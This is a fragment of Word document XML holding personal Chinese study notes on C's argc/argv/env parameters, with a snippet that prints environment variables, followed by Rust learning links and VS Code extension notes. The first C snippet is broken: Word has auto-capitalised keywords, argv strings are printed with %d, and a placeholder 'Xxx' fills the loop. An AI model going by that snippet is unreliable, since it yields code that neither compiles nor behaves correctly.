        <w:t xml:space="preserve"> char* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向的是具体的字符串（即字符数组）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5C8756" w14:textId="77777777" w:rsidR="00397954" w:rsidRDefault="00397954" w:rsidP="00397954"/>
    <w:p w14:paraId="36FA596F" w14:textId="64F65324" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="003F304B">
      <w:r>
        <w:t>argv[0] is the name of the program (or the path used to execute it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3863B6A5" w14:textId="5025FA76" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="00350727">
      <w:r>
        <w:t>argv[1] to argv[argc-1] are the actual arguments passed to the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503D8B06" w14:textId="77777777" w:rsidR="002C14D1" w:rsidRDefault="002C14D1" w:rsidP="00350727"/>
    <w:p w14:paraId="1A5D0532" w14:textId="624DE876" w:rsidR="00350727" w:rsidRDefault="00350727" w:rsidP="00350727">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nt main(int argc, char **argv, char **env){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0A81C4" w14:textId="69ED1530" w:rsidR="00350727" w:rsidRDefault="00350727" w:rsidP="00350727">
      <w:r>
        <w:tab/>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rint(</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>argc = %d\n</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, argc);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A21A8A" w14:textId="2BB02BBF" w:rsidR="00507D31" w:rsidRDefault="00507D31" w:rsidP="00507D31">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rint(</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>argv[0] = %d\n</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, argv[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F021C6" w14:textId="4DD3575D" w:rsidR="00507D31" w:rsidRDefault="00507D31" w:rsidP="00507D31">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rint(</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>argv[1] = %d\n</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, argv[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6195FB47" w14:textId="77777777" w:rsidR="00507D31" w:rsidRDefault="00507D31" w:rsidP="00507D31">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">or (int </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=0; i&lt;argc; i++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A2DF5E" w14:textId="762B5CEE" w:rsidR="00507D31" w:rsidRDefault="00507D31" w:rsidP="00507D31">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799AF763" w14:textId="52BC9B69" w:rsidR="00507D31" w:rsidRPr="00507D31" w:rsidRDefault="00507D31" w:rsidP="00507D31">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6D9F00" w14:textId="1F7659BA" w:rsidR="00350727" w:rsidRDefault="00350727" w:rsidP="00350727">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED12BD7" w14:textId="77F3DC32" w:rsidR="00350727" w:rsidRDefault="00281FDC" w:rsidP="00281FDC">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00281FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境变量值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7065B996" w14:textId="08EE4719" w:rsidR="00281FDC" w:rsidRPr="00281FDC" w:rsidRDefault="00281FDC" w:rsidP="00281FDC">
      <w:r w:rsidRPr="00281FDC">
        <w:t>char **env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00281FDC">
        <w:t>char *env[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7AD95A" w14:textId="4680E3D1" w:rsidR="00350727" w:rsidRDefault="00281FDC" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>形式同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>char **agv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是编译器默认定义好的数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4731A5" w14:textId="77777777" w:rsidR="00350727" w:rsidRDefault="00350727" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CF97C3" w14:textId="007F8FDA" w:rsidR="00281FDC" w:rsidRPr="00281FDC" w:rsidRDefault="00281FDC" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00281FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些字符串是环境变量的名称和值，通常以</w:t>
      </w:r>
      <w:r w:rsidRPr="00281FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00281FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"NAME=VALUE"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2966D981" w14:textId="77777777" w:rsidR="00281FDC" w:rsidRDefault="00281FDC" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03399497" w14:textId="77777777" w:rsidR="00281FDC" w:rsidRPr="00A425B6" w:rsidRDefault="00281FDC" w:rsidP="00281FDC">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A425B6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5306242B" w14:textId="77777777" w:rsidR="00281FDC" w:rsidRPr="00A425B6" w:rsidRDefault="00281FDC" w:rsidP="00281FDC">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA6721F" w14:textId="77777777" w:rsidR="00281FDC" w:rsidRPr="00A425B6" w:rsidRDefault="00281FDC" w:rsidP="00281FDC">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A425B6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>int main(int argc, char **argv, char **env) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6574DA57" w14:textId="77777777" w:rsidR="00281FDC" w:rsidRPr="00A425B6" w:rsidRDefault="00281FDC" w:rsidP="00281FDC">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A425B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r w:rsidRPr="00A425B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>遍历并打印所有环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE91598" w14:textId="77777777" w:rsidR="00281FDC" w:rsidRPr="00A425B6" w:rsidRDefault="00281FDC" w:rsidP="00281FDC">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A425B6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    for (int i = 0; </w:t>
      </w:r>
      <w:r w:rsidRPr="00A425B6">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>env[i] != NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A425B6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEE47D3" w14:textId="77777777" w:rsidR="00281FDC" w:rsidRPr="00A425B6" w:rsidRDefault="00281FDC" w:rsidP="00281FDC">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A425B6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        printf("%s\n", env[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76466129" w14:textId="77777777" w:rsidR="00281FDC" w:rsidRPr="00A425B6" w:rsidRDefault="00281FDC" w:rsidP="00281FDC">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A425B6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A573C" w14:textId="77777777" w:rsidR="00281FDC" w:rsidRPr="00A425B6" w:rsidRDefault="00281FDC" w:rsidP="00281FDC">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A425B6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767DAC93" w14:textId="78C15DA7" w:rsidR="00D17E3E" w:rsidRDefault="00281FDC" w:rsidP="00281FDC">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A425B6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA981D1" w14:textId="77777777" w:rsidR="00D17E3E" w:rsidRDefault="00D17E3E" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70AFB7D3" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202C040E" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A43DDD" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE62AA3" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EFEA9DF" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AC7B71D" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AC8AAF9" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5411B0" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473750E6" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="797D44A7" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3576E585" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76AAD914" w14:textId="5E2B8463" w:rsidR="00233F37" w:rsidRDefault="005C1D25" w:rsidP="005C1D25">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>RUST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5381F250" w14:textId="77777777" w:rsidR="007607E1" w:rsidRDefault="007607E1" w:rsidP="007607E1"/>
    <w:p w14:paraId="33E635DB" w14:textId="6C141720" w:rsidR="007607E1" w:rsidRPr="007607E1" w:rsidRDefault="007607E1" w:rsidP="007607E1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007607E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>RUST</w:t>
      </w:r>
      <w:r w:rsidRPr="007607E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的运行环境在我的</w:t>
      </w:r>
      <w:r w:rsidRPr="007607E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>win10</w:t>
      </w:r>
      <w:r w:rsidRPr="007607E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="007607E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vmware</w:t>
      </w:r>
      <w:r w:rsidRPr="007607E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB9D075" w14:textId="77777777" w:rsidR="007607E1" w:rsidRPr="007607E1" w:rsidRDefault="007607E1" w:rsidP="007607E1"/>
    <w:p w14:paraId="3FAC5E96" w14:textId="14258EA0" w:rsidR="00970E74" w:rsidRDefault="005C1D25" w:rsidP="00490D28">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>教程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147F5EF2" w14:textId="77777777" w:rsidR="00970E74" w:rsidRDefault="00970E74" w:rsidP="005C1D25"/>
    <w:p w14:paraId="1AD6D336" w14:textId="77777777" w:rsidR="00970E74" w:rsidRDefault="00970E74" w:rsidP="00970E74">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Rust </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方网站：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.rust-lang.org/zh-CN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E718A85" w14:textId="77777777" w:rsidR="00970E74" w:rsidRDefault="00970E74" w:rsidP="00970E74">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Rust </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方文档：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://doc.rust-lang.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DBEA3B" w14:textId="77777777" w:rsidR="00970E74" w:rsidRDefault="00970E74" w:rsidP="00970E74">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Rust Play</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://play.rust-lang.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA92384" w14:textId="5C9BA7A4" w:rsidR="005C1D25" w:rsidRDefault="00970E74" w:rsidP="00970E74">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Visual Studio Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId89" w:history="1">
        <w:r w:rsidR="00C80E7D" w:rsidRPr="001F0181">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://code.visualstudio.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6418A286" w14:textId="77777777" w:rsidR="00C80E7D" w:rsidRDefault="00C80E7D" w:rsidP="00970E74"/>
    <w:p w14:paraId="6CC7C451" w14:textId="60A82467" w:rsidR="00C80E7D" w:rsidRPr="00C80E7D" w:rsidRDefault="00C80E7D" w:rsidP="00970E74">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80E7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>优先看的原生文档：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAD477C" w14:textId="300A47D6" w:rsidR="005C1D25" w:rsidRDefault="00C80E7D" w:rsidP="005C1D25">
      <w:hyperlink r:id="rId90" w:history="1">
        <w:r w:rsidRPr="001F0181">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://doc.rust-lang.org/book/ch00-00-introduction.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="434FC569" w14:textId="70E42A10" w:rsidR="00C80E7D" w:rsidRDefault="008E2081" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准库文档：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350D66E0" w14:textId="798EC0EC" w:rsidR="008E2081" w:rsidRDefault="008E2081" w:rsidP="005C1D25">
      <w:r w:rsidRPr="008E2081">
        <w:t>https://doc.rust-lang.org/std/prelude/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020942CA" w14:textId="77777777" w:rsidR="008E2081" w:rsidRPr="00C80E7D" w:rsidRDefault="008E2081" w:rsidP="005C1D25"/>
    <w:p w14:paraId="29843DE0" w14:textId="1491EC08" w:rsidR="007C5A6F" w:rsidRDefault="007C5A6F" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方教程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFD8465" w14:textId="1B7FC448" w:rsidR="005C1D25" w:rsidRDefault="00490D28" w:rsidP="005C1D25">
      <w:r w:rsidRPr="00490D28">
        <w:t>https://www.rust-lang.org/learn/get-started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DB729A" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="5A739B71" w14:textId="613ED839" w:rsidR="00D64E55" w:rsidRDefault="0032179D" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>稍微旧一些的教程都说使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VSCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月底，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JetBrain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RUSTRover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个编译器更适合写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Rust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6656FB4E" w14:textId="77777777" w:rsidR="00D64E55" w:rsidRDefault="00D64E55" w:rsidP="005C1D25"/>
    <w:p w14:paraId="71508437" w14:textId="180C849D" w:rsidR="005C3BE8" w:rsidRDefault="00146663" w:rsidP="00146663">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598F1DB5" w14:textId="652739C5" w:rsidR="00146663" w:rsidRDefault="00146663" w:rsidP="00146663">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接仿照</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045493AC" w14:textId="31680894" w:rsidR="00146663" w:rsidRPr="00146663" w:rsidRDefault="00146663" w:rsidP="00146663">
      <w:r w:rsidRPr="00146663">
        <w:t>https://www.runoob.com/rust/rust-setup.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4E972E" w14:textId="77777777" w:rsidR="00504C5E" w:rsidRDefault="00504C5E" w:rsidP="005C1D25"/>
    <w:p w14:paraId="334347FC" w14:textId="77777777" w:rsidR="00504C5E" w:rsidRDefault="00504C5E" w:rsidP="005C1D25"/>
    <w:p w14:paraId="60169D28" w14:textId="3B37D7DB" w:rsidR="00504C5E" w:rsidRDefault="00504C5E" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VScode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得安装三个插件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6337CF" w14:textId="367D3092" w:rsidR="00F537B3" w:rsidRDefault="00F537B3" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rust-analyzer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA3E434" w14:textId="59769D4B" w:rsidR="00F537B3" w:rsidRDefault="00F537B3" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Native Debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6251F81D" w14:textId="17E9DD57" w:rsidR="00504C5E" w:rsidRDefault="00F537B3" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C/C++ (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不安装这个没法调试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
